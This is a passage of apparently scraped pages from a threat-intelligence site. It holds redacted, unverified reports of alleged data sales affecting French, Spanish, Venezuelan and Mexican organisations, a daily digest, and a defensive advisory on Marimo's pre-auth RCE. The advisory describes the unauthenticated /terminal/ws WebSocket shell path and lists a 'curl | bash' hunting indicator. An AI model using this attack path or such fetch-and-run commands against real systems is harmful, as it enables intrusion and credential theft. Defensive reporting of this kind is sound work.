authorities have not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Sell a Carvivo Automotive Lead Database Affecting Millions in France URL: https://darkwebinformer.com/threat-actor-claims-to-sell-a-carvivo-automotive-lead-database-affecting-millions-in-france/ Last updated: 2026-06-03T16:55:11.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Automotive # Threat Actor Claims to Sell a Carvivo Automotive Lead Database Affecting Millions in France A threat actor using the alias **DumpsecV2** ("Dumpsec") claims to be selling a large dataset stolen from **Carvivo**, a French SaaS provider whose "Carvivo Contact" platform manages automotive sales leads for car dealerships across Europe. The post advertises files totaling **millions of records**, including roughly **3.2 million unique email addresses** and about **5 million vehicle plate numbers**, priced at **5,000 EUR**. The claim is **unverified** and Carvivo has not publicly addressed it. Severity CRITICAL Data14M+ leads PriceEUR 5,000 Country![France flag](https://flagcdn.com/w40/fr.png)France ActorDumpsecV2 ## ▣Post details TargetCarvivo (Carvivo Contact, automotive lead SaaS) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorAutomotive SaaS / Lead Management ClaimLead database offered for sale Data\~14M people; 3.2M emails; 5M plates ObservedJun 3, 2026 PriceEUR 5,000 ActorDumpsecV2 (Dumpsec) ## !Allegedly exposed - \~14M people across two files (claimed) - 3.2M unique email addresses - 5M+ vehicle plate numbers - Contact / prospect names - Phone numbers (primary & secondary) - Vehicle make, model, mileage & price - Registration & VIN data - Dealership / sales-outlet assignment - Lead notes & enquiry details - Opt-in / marketing status ## ␱Screenshot [ ![Carvivo France alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/942385762938765892763459876698273.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/942385762938765892763459876698273.png) ## ⚠Potential impact If genuine, a dataset spanning **millions of automotive leads**, names, emails, phone numbers, vehicle registration and plate data, and dealer notes, would be highly valuable for spam, phishing, and vehicle-related fraud. The seller explicitly markets the emails for spam and the plate numbers for fraudulent reuse, and plate-to-owner linkage is especially sensitive. As with any large for-sale listing, the figures may be inflated or partly recycled from earlier data. ## iStatus Unverified Sample files, proof galleries, and a sale price were posted to an underground forum, with a Session contact for buyers; the sample links, galleries, contact identifiers, and the personal records shown in the post are not reproduced here. The claim has **not been independently confirmed** and Carvivo has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Sell 58K Confidential SUNACOOP Venezuela Cooperative Records URL: https://darkwebinformer.com/threat-actor-claims-to-sell-58k-confidential-sunacoop-venezuela-cooperative-records/ Last updated: 2026-06-02T17:27:27.000Z Breach Report ![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela Government # Threat Actor Claims to Sell 58K Confidential SUNACOOP Venezuela Cooperative Records A threat actor using the alias **malconguerra2** claims to be selling a confidential dataset attributed to **SUNACOOP**, Venezuela's national superintendency of cooperatives. The listing advertises **58,153 records** in JSON (about **24.8 MB**) covering cooperative associations and related personal details, with a small sample and a Telegram contact for buyers. The claim is **unverified** and SUNACOOP has not publicly addressed it. Severity MEDIUM Data58.2K records PriceTelegram sale Country![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela Actormalconguerra2 ## ▣Post details TargetSUNACOOP (Superintendencia Nacional de Cooperativas) Country![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela SectorGovernment / Cooperatives Regulator ClaimConfidential dataset offered for sale Data58,153 records, JSON, 24.8 MB ObservedJun 2, 2026 PriceTelegram sale Actormalconguerra2 ## !Allegedly exposed - 58,153 records (claimed) - Cooperative association records - Names of representatives / members - Addresses (building / location) - State, municipality & parish IDs - Sector / activity classification - Registry & administrative data - Government-held cooperative data ## ␱Screenshot [ ![SUNACOOP Venezuela alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/754863389273654987263598762359879872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/754863389273654987263598762359879872.png) ## ⚠Potential impact If genuine, the exposure of **58,000+ records** from a cooperatives regulator, including names, addresses, and location identifiers tied to cooperative associations, could enable targeted fraud, phishing, and profiling of members and organizations. The dataset is smaller and less sensitive than national identity or financial leaks, but still represents confidential government data. As with any "for sale" listing, the record count and authenticity are unconfirmed. ## iStatus Unverified A small sample file and JSON excerpts were posted to an underground forum, with the full dataset behind a reply/upgrade paywall and a Telegram contact for buyers; the sample, links, and contact are not reproduced here. The claim has **not been independently confirmed** and SUNACOOP has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Leak 10,000+ Records From the Nayarit Public Property Registry URL: https://darkwebinformer.com/threat-actor-claims-to-leak-10-000-records-from-the-nayarit-public-property-registry/ Last updated: 2026-06-02T16:09:37.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government # Threat Actor Claims to Leak 10,000+ Records From the Nayarit Public Property Registry A threat actor using the alias **Hermes\_Olymp**, posting on behalf of "**Olympus\_Group**," claims to have leaked **10,000+ records** from the **RPP Nayarit**, the public property registry of Nayarit state, Mexico. The post says each entry can list **up to four property owners**, each with full personal details, and that the data is being given away **for free**. The claim is **unverified** and the registry has not publicly addressed it. Severity HIGH Data10K+ records PriceFree dump Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico ActorHermes\_Olymp ## ▣Post details TargetRPP Nayarit (Registro Público de la Propiedad) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Property Registry ClaimFree data dump posted (no price) Data10,000+ property-registry records ObservedJun 2, 2026 PriceFree dump ActorHermes\_Olymp (Olympus\_Group) ## !Allegedly exposed - 10,000+ registry records (claimed) - Up to 4 property owners per entry - Full names of property owners - Personal details of owners - Property ownership records - Registry entry data - Nayarit state RPP data - Government-held property data ## ␱Screenshot [ ![Nayarit public property registry alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923785629873649872635987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923785629873649872635987623.png) ## ⚠Potential impact If genuine, property-registry entries with full names and personal details of **up to four owners each** could enable identity theft, targeted fraud, and physical-security risks tied to property ownership, since the data links named individuals to specific properties. Because it is being distributed **for free**, it can spread widely and quickly once posted. The 10,000+ figure is the poster's claim and is not confirmed. ## iStatus Unverified The post links to a free download and a Telegram contact; the download link and contact are not reproduced here. The claim has **not been independently confirmed**, and the registry and Nayarit authorities have not publicly addressed it. Free, attention-seeking dumps like this are sometimes exaggerated or partly recycled. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Sell a 110 GB Iberdrola Customer Database Affecting 7 Million Customers URL: https://darkwebinformer.com/threat-actor-claims-to-sell-a-110-gb-iberdrola-customer-database-affecting-7-million-customers/ Last updated: 2026-06-02T15:31:58.000Z Breach Report ![Spain flag](https://flagcdn.com/w40/es.png)Spain Energy # Threat Actor Claims to Sell a 110 GB Iberdrola Customer Database Affecting 7 Million Customers A threat actor using the alias **spain** claims to be selling a **109.79 GB** customer database stolen from **Iberdrola**, one of the world's largest electricity utilities, and lists the domain **iberdrola.es**. The post advertises data on **more than 7 million customers**, including banking (IBAN), national ID, and contact details, with a small sample and a Telegram contact for buyers. The intrusion is attributed in the post to "RP" and is **unverified**; Iberdrola has not publicly addressed it. Severity CRITICAL Data7M customers / 110 GB PriceTelegram sale Country![Spain flag](https://flagcdn.com/w40/es.png)Spain Actorspain ## ▣Post details TargetIberdrola (iberdrola.es) Country![Spain flag](https://flagcdn.com/w40/es.png)Spain SectorEnergy / Electric Utility ClaimCustomer database offered for sale Data\~7M customer records, 109.79 GB ObservedJun 1, 2026 PriceTelegram sale Actorspain (claims hacked by "RP") ## !Allegedly exposed - 7M+ customer records (claimed) - Customer names & account IDs - IBAN bank account numbers - National IDs (DNI / NIF / CIF) - Email addresses & phone numbers - Addresses (city, province, ZIP) - Tariff, contract & power (potencia) data - Billing & purchase totals - Supply-point identifiers (CUPS) - Customer photos & call records ## ␱Screenshot [ ![Iberdrola Spain alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2397586238975698723649876325498721-1.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2397586238975698723649876325498721-1.png) ## ⚠Potential impact If genuine, a dataset of **7 million customers** containing IBAN bank details, national IDs (DNI/NIF/CIF), emails, phone numbers, and addresses would be highly valuable for financial fraud, phishing, and identity theft at scale across Spain. Energy-account and supply-point details could also enable convincing, targeted scams against utility customers. As with any large "for sale" listing, the figures may be inflated or partly recycled from earlier breaches. ## iStatus Unverified A sample and a full column listing were posted to an underground forum, with the full dataset offered via a Telegram contact and escrow; the sample links, password, and contact identifiers are not reproduced here. The claim has **not been independently confirmed** and Iberdrola has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Sell 24 Million Confidential SENIAT Venezuela Tax Records, 30 GB URL: https://darkwebinformer.com/threat-actor-claims-to-sell-24-million-confidential-seniat-venezuela-tax-records-30-gb/ Last updated: 2026-06-01T19:56:17.000Z Breach Report ![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela Government # Threat Actor Claims to Sell 24 Million Confidential SENIAT Venezuela Tax Records, 30 GB A threat actor using the alias **malconguerra2** claims to be selling a **30 GB** confidential dataset attributed to **SENIAT**, Venezuela's national tax and customs authority. The listing advertises roughly **24 million unique records** in JSON covering legal entities, individuals, foreigners, passports, and government data, with a small free sample and a Telegram contact for buyers. The claim is **unverified** and SENIAT has not publicly addressed it. Severity CRITICAL Data24M records / 30 GB PriceTelegram sale Country![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela Actormalconguerra2 ## ▣Post details TargetSENIAT (Servicio Nacional Integrado de Administración Aduanera y Tributaria) Country![Venezuela flag](https://flagcdn.com/w40/ve.png)Venezuela SectorGovernment / Tax & Customs ClaimConfidential dataset offered for sale Data24M records, JSON, 30 GB ObservedJun 1, 2026 PriceTelegram sale Actormalconguerra2 ## !Allegedly exposed - \~24 million unique records (claimed) - Personal data of individuals (naturals) - Legal-entity / company records - Foreign nationals' records - Passport information - Tax IDs (RIF) and registration data - National ID / cédula holder data - Government-related taxpayer data - 23.6M CI-person JSON records - 30 GB total, JSON format ## ␱Screenshots [ ![SENIAT Venezuela alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/75238956273984698723659876239873-1.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/75238956273984698723659876239873-1.png) [ ![SENIAT Venezuela alleged data leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/75238956273984698723659876239874-1.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/75238956273984698723659876239874-1.png) ## ⚠Potential impact If genuine, the exposure of **24 million records** from a national tax authority, including identity, passport, and tax-registration data for individuals, foreigners, and companies, could enable large-scale identity theft, fraud, and targeting across much of the taxpaying population. Aggregated government and entity data would also be valuable for follow-on attacks and social engineering. Listings of this scale are also frequently exaggerated, recycled, or partly fabricated. ## iStatus Unverified A small sample file and JSON data excerpts were posted to an underground forum, with the full dataset behind a reply/upgrade paywall and a Telegram contact for buyers; the sample, links, and contact are not reproduced here. The claim has **not been independently confirmed** and SENIAT has not publicly addressed it. Large national-database listings are sometimes overstated or scams. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Leak an INEGI Mexico Database Dump, 122K Businesses + 30K PII Records URL: https://darkwebinformer.com/threat-actor-claims-to-leak-an-inegi-mexico-database-dump-122k-businesses-30k-pii-records/ Last updated: 2026-06-01T16:27:53.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government # Threat Actor Claims to Leak an INEGI Mexico Database Dump, 122K Businesses + 30K PII Records A threat actor using the alias **sativa** claims to have leaked a database dump attributed to **INEGI**, Mexico's national statistics institute, allegedly sourced from internal **GOB.MX** services. The post advertises roughly **122,000 business directory records** and **30,000 birth records** with personal data, plus full PostgreSQL/PostGIS cartography, and provides free download links. The claim is **unverified**, and part of the business directory (DENUE) is data INEGI normally publishes openly. Severity HIGH Data122K + 30K records PriceFree dump Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Actorsativa ## ▣Post details TargetINEGI (Instituto Nacional de Estadística y Geografía) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / National Statistics ClaimFree database dump posted with download links DataBusiness directory + birth records + cartography ObservedJun 1, 2026 PriceFree dump Actorsativa ## !Allegedly exposed - DENUE business directory (\~122,173 records) - Business names, legal names & addresses - Postal codes and business phone numbers - Business emails, websites & social handles - GPS coordinates of establishments - Birth records (\~30,363 records) - Newborn birth date, sex, weight & height - Mother's age, education & marital status - Hospital facility codes (CLUES) & APGAR - Full PostGIS cartography (states to blocks) ## ␱Screenshots [ ![INEGI alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2357986239857623987462987536987623598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2357986239857623987462987536987623598723.png) [ ![INEGI alleged data leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2357986239857623987462987536987623598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2357986239857623987462987536987623598724.png) ## ⚠Potential impact If the dump is genuine, the exposure of roughly **30,000 birth records**, including newborn details, mothers' ages, education and marital status, and hospital facility codes, could enable serious privacy violations and the targeting of identifiable individuals. The business directory adds contact details and precise GPS coordinates usable for fraud or spam, though **much of the DENUE dataset is normally public**. A claimed compromise of GOB.MX internal services would also raise broader concerns about government system access. ## iStatus Unverified Free download links and data samples were posted to an underground forum; the samples, links, and actor contact details are not reproduced here. The claim has **not been independently confirmed**, INEGI/GOB.MX has not publicly addressed it, and because some of the listed business directory data is routinely published by INEGI, the dump's novelty and authenticity remain uncertain. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Actor Claims to Sell Live Web-Shell Access to a NASA Web Application URL: https://darkwebinformer.com/threat-actor-claims-to-sell-live-web-shell-access-to-a-nasa-web-application/ Last updated: 2026-06-01T15:31:58.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Australian Workplace Catering Platform Hampr Hit by Alleged 360K+ Record Leak URL: https://darkwebinformer.com/australian-workplace-catering-platform-hampr-hit-by-alleged-360k-record-leak/ Last updated: 2026-05-31T15:47:50.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Root in One Request: Pre-Auth RCE in Marimo (CVE-2026-39987) URL: https://darkwebinformer.com/root-in-one-request-pre-auth-rce-in-marimo-cve-2026-39987/ Last updated: 2026-05-29T17:37:43.000Z Critical CVSS 4.0 9.3 Status Actively Exploited CISA KEV Added 2026-04-23 # Root in One Request: Pre-Auth RCE in Marimo (CVE-2026-39987) Marimo Python Notebook • CWE-306 Missing Authentication • Published 2026-04-09 ## Vulnerability Overview [CVE-2026-39987](https://nvd.nist.gov/vuln/detail/CVE-2026-39987) is a critical pre-authentication remote code execution flaw in **Marimo**, a popular open-source reactive Python notebook framework and a modern alternative to Jupyter with roughly 19.6k GitHub stars. A remote, unauthenticated attacker only has to complete a single WebSocket handshake to an exposed instance to obtain a full interactive shell as the user running the Marimo process. Carrying a **CVSS v4.0 score of 9.3**, the bug was exploited in the wild within hours of public disclosure and was added to the [CISA Known Exploited Vulnerabilities catalog](https://www.cisa.gov/news-events/alerts/2026/04/23/cisa-adds-one-known-exploited-vulnerability-catalog) on April 23, 2026, with a federal remediation deadline of May 7, 2026. CVE ID CVE-2026-39987 CVSS Score 9.3 - Critical Weakness CWE-306 Affected Product Marimo Notebook Affected Versions All < 0.23.0 Attack Vector Network / Unauthenticated Exploitation In the Wild Fixed In 0.23.0 Bottom Line If you run Marimo in edit mode anywhere reachable beyond a tightly trusted network, upgrade to 0.23.0 immediately and treat any unpatched, internet-adjacent instance as an active incident risk rather than a theoretical CVE. ## Why Marimo Is a High-Value Target Marimo is used heavily in data science, ML experimentation, and internal analytics, and is frequently run in containers with network access for collaboration. As [Endor Labs noted](https://www.endorlabs.com/learn/root-in-one-request-marimos-critical-pre-auth-rce-cve-2026-39987), the product's emphasis on remote sharing and interactive editing pushes many real deployments toward browser-reachable edit servers, and those hosts commonly sit next to sensitive data: environment files, cloud credentials, databases, and internal APIs. A single unauthenticated shell on one of these boxes often means access to colocated services and production secrets on disk, so the practical blast radius extends well past the notebook process itself. ## Technical Analysis At its core this is a WebSocket authentication failure. Marimo exposes multiple WebSocket endpoints, and the primary session path runs every connection through `validate_auth()` so that only authorized clients keep a session. The integrated terminal followed a different code path: according to the [official advisory](https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc), `marimo/_server/api/endpoints/terminal.py` accepted connections after only checking that the server was in edit mode and that the platform supported a PTY, skipping the authentication validation used everywhere else. One WebSocket route was protected; a parallel route that hands out a shell was not. Middleware did not close the gap. Marimo relies on Starlette's `AuthenticationMiddleware`, which can mark a connection as unauthenticated without rejecting the WebSocket upgrade outright. Real protection has to happen at the endpoint, through `validate_auth()`, a decorator, or equivalent enforcement. Because the terminal path skipped that step, an unauthenticated client could still reach `websocket.accept()` and the subsequent `pty.fork()`, landing a live shell. The full attack chain is brutally short: the attacker opens a WebSocket to `/terminal/ws` (or `wss://` behind TLS), the server accepts it with no credentials, allocates a PTY and a shell, and the attacker runs arbitrary commands as the Marimo process - commonly root in default Docker images. There is no phishing, no stolen session, and no supply-chain trick. The terminal route is only wired up when the notebook runs in edit mode, so read-only or static notebook serving does not expose the path in the same way. ## Active Exploitation in the Wild This is not theoretical. The [GitHub advisory](https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc) was published on April 8, 2026, and [exploitation began in under 10 hours](https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html). The [Sysdig Threat Research Team](https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours), running honeypot nodes across multiple cloud providers, observed the first exploitation attempt within 9 hours and 41 minutes of publication, with a complete credential-theft operation executed in under three minutes. Because the advisory itself documented a working proof of concept, attackers needed no exploit development of their own. The follow-on activity has been serious. Researchers have [tracked a campaign](https://gbhackers.com/weaponized-cve-2026-39987/) that uses the flaw to deploy a NKAbuse backdoor variant hosted on Hugging Face Spaces, pairing pre-auth RCE with credential theft, lateral movement into PostgreSQL and Redis, and a blockchain-based (NKN) command-and-control channel that is hard to monitor or block. One operator alone generated 195 events over more than three hours. Indicators worth hunting for include suspicious `curl | bash` executions referencing `vsccode-modetx`, the presence of `~/.kagent` directories, unusual per-user systemd services, and outbound NKN-related traffic from developer workstations. Exposure is also easy to underestimate. Endor Labs attempted only an unauthenticated upgrade to `/terminal/ws` against a sample of 186 internet-reachable Marimo URLs and found 30 of them, about 16 percent, completing the handshake - the exact technical step an attacker takes immediately before issuing the first command. ## Detection Because the probe is a single WebSocket upgrade, the most reliable signals are behavioral. Monitor for WebSocket connections to terminal paths from unexpected clients, and alert on new interactive shells, unusual process trees, and atypical outbound traffic from notebook infrastructure. A safe, non-destructive check is to attempt an unauthenticated upgrade to `/terminal/ws` against your own instances: a patched server (0.23.0 or later) refuses the connection at the authentication layer, while a vulnerable one completes the handshake. Detection Tell Marimo 0.23.0 aligns the terminal WebSocket with the same validation used by the primary session WebSocket, so a patched server rejects the unauthenticated `/terminal/ws` upgrade instead of allocating a PTY. Assume in-the-wild abuse and hunt for post-exploitation artifacts even if you never saw the probe in your logs. ## Affected Versions & Fixes | Product | Affected | Resolution | | --------------- | ------------ | --------------------------------------------------- | | Marimo < 0.23.0 | Vulnerable | Upgrade with pip install --upgrade "marimo>=0.23.0" | | Marimo 0.23.0+ | Not affected | Terminal WebSocket now enforces authentication | One versioning note: the advisory body text originally listed Marimo 0.20.4 and earlier as affected, but the structured version range consumed by tools such as Dependabot, pip-audit, and OSV was corrected to all versions prior to 0.23.0\. Treat anything below 0.23.0 as vulnerable. ## Mitigation & Remediation Priority order, drawn from the [vendor advisory](https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc) and [Endor Labs' analysis](https://www.endorlabs.com/learn/root-in-one-request-marimos-critical-pre-auth-rce-cve-2026-39987): 1. **Patch immediately.** Upgrade to Marimo 0.23.0 or newer. This is the only complete fix, because it adds the missing authentication enforcement to the terminal WebSocket endpoint. 2. **Do not expose edit mode to untrusted networks.** Place edit-mode instances behind VPNs, private subnets, authenticated proxies, and allowlists rather than the open internet. 3. **Avoid binding to 0.0.0.0.** Do not bind Marimo to all interfaces unless your network controls are explicit and verified. 4. **Harden the container and secrets.** Run as a non-root user with read-only roots and minimal capabilities where practical, keep production `.env` files off shared lab hosts, and rotate any credentials that may have been exposed. 5. **Hunt for compromise.** Review notebook hosts for the campaign indicators above, watch for unexpected shells and egress, and assume day-one exploitation given the public proof of concept. ## The Bigger Picture CVE-2026-39987 is a textbook case of asymmetric trust: users believe the server requires authentication, while one WebSocket URL quietly did not. WebSocket upgrades are easy to overlook in code review because they resemble streaming HTTP, but a long-lived, full-duplex channel needs its identity and authorization established explicitly at upgrade time. The broader lesson applies to any developer tooling with terminals, REPLs, or kernels: powerful execution features demand strict gates - strong authentication, explicit enablement, and least privilege - and a product story built on sharing and remote access must assume every WebSocket and debug feature is part of the attack surface. ## References - [Marimo GitHub Security Advisory - GHSA-2679-6mx9-h9xc](https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc) - [NVD - CVE-2026-39987](https://nvd.nist.gov/vuln/detail/CVE-2026-39987) - [CISA - KEV Catalog Addition (2026-04-23)](https://www.cisa.gov/news-events/alerts/2026/04/23/cisa-adds-one-known-exploited-vulnerability-catalog) - [Endor Labs - Root in One Request: Technical Analysis](https://www.endorlabs.com/learn/root-in-one-request-marimos-critical-pre-auth-rce-cve-2026-39987) - [Sysdig TRT - From Disclosure to Exploitation in Under 10 Hours](https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours) - [The Hacker News - Exploited Within 10 Hours of Disclosure](https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html) - [GBHackers - Weaponized to Push a Blockchain Backdoor](https://gbhackers.com/weaponized-cve-2026-39987/) - [Marimo - Fix Pull Request #9098](https://github.com/marimo-team/marimo/pull/9098) - [CWE-306 - Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html) ### Argentine Healthcare Provider Swiss Medical Listed in Alleged 458K-Record Member Data Sale URL: https://darkwebinformer.com/argentine-healthcare-provider-swiss-medical-listed-in-alleged-458k-record-member-data-sale/ Last updated: 2026-05-29T17:54:03.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### French Real-Estate Co-op Platform Amepi Hit by Alleged 6K-Record Leak URL: https://darkwebinformer.com/french-real-estate-co-op-platform-amepi-hit-by-alleged-6k-record-leak/ Last updated: 2026-05-29T17:53:04.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Daily Dose of Dark Web Informer - May 28th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-28th-2026/ Last updated: 2026-05-28T22:34:42.000Z Dark Web Informer # Daily Threat Intelligence Digest Real-time breach tracking, ransomware activity, and dark-web monitoring. **12** SIGNALS TODAY **6** REPORTS REAL-TIME Data Access 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms [/socials ↗](https://darkwebinformer.com/socials) Reach 🔥 Advertising Opportunities Reach a highly engaged security audience. [View details →](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews LAST 30 DAYS · AS OF 2026-05-11 · NEXT UPDATE 06-11 Premium 🔒 Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) Classification Key 📰**Law Enforcement** \- LEA updates, investigations ⚠️**Dark Web Notices** \- forums, markets, announcements ❗️**Urgent Threats** \- breaches, ransomware, vulnerabilities 💡**Insights & Tools** \- guides, OSINT, learning resources █ Today's Intelligence 12 ENTRIES Threat Intelligence · Reports REPORT❗️[Brazilian Food-Delivery Giant iFood Targeted in Alleged 43.8M-Record Customer Data Extortion](https://darkwebinformer.com/brazilian-food-delivery-giant-ifood-targeted-in-alleged-43-8m-record-customer-data-extortion/) REPORT❗️[French Government Platform Resana Listed in Alleged 990K-Record User Data Sale](https://darkwebinformer.com/french-government-platform-resana-listed-in-alleged-990k-record-user-data-sale/) REPORT❗️[French Real-Estate Platform Figaro Immobilier Hit by Alleged 100K Invoice Leak](https://darkwebinformer.com/french-real-estate-platform-figaro-immobilier-hit-by-alleged-100k-invoice-leak/) REPORT❗️[French Real-Estate Tour Platform EnVisite Hit by Alleged 138K-Record Leak](https://darkwebinformer.com/french-real-estate-tour-platform-envisite-hit-by-alleged-138k-record-leak/) REPORT❗️[One Forged Header: Unauthenticated Authentication Bypass in Fortinet FortiClient EMS (CVE-2026-35616)](https://darkwebinformer.com/one-forged-header-unauthenticated-authentication-bypass-in-fortinet-forticlient-ems-cve-2026-35616/) REPORT❗️[US Student Mental-Health Provider Mindpath College Health Listed on Ransomware Leak Site](https://darkwebinformer.com/us-student-mental-health-provider-mindpath-college-health-listed-on-ransomware-leak-site/) X / Twitter Updates NOTICE⚠️[850M India Nationwide Identity Dataset allegedly listed for sale](https://x.com/DarkWebInformer/status/2060014493007073313?s=20) NOTICE⚠️[ShinyHunters has leaked 42 Million records of data from Charter Communications.](https://x.com/DarkWebInformer/status/2060022175831109739?s=20) UPDATE💡[STIX endpoints will be available for users who subscribe to the API sometime tomorrow as promised. I just need to finish updating the docs.](https://x.com/DarkWebInformer/status/2060028850466099616?s=20) NOTICE⚠️[Groupe IMA allegedly targeted in 6.2GB data leak](https://x.com/DarkWebInformer/status/2060061203817234504?s=20) NOTICE⚠️[Ecuadorian Armed Forces allegedly targeted in confidential insurance document leak](https://x.com/DarkWebInformer/status/2060067124643610971?s=20) UPDATE💡[The threat actor leaderboard and cybercrime website leaderboard that are in the early access program may stop working every once and a while for the next couple of weeks as I make changes for Threat Feed 3.0\. Apologies in advance. Bonk me if I don't notice it.](https://x.com/DarkWebInformer/status/2060079008616763793?s=20) [darkwebinformer.com](https://darkwebinformer.com/) · [socials](https://darkwebinformer.com/socials) · [subscribe](https://darkwebinformer.com/pricing) · [donate](https://darkwebinformer.com/donations/) © DARK WEB INFORMER · ALL RIGHTS RESERVED ### US Student Mental-Health Provider Mindpath 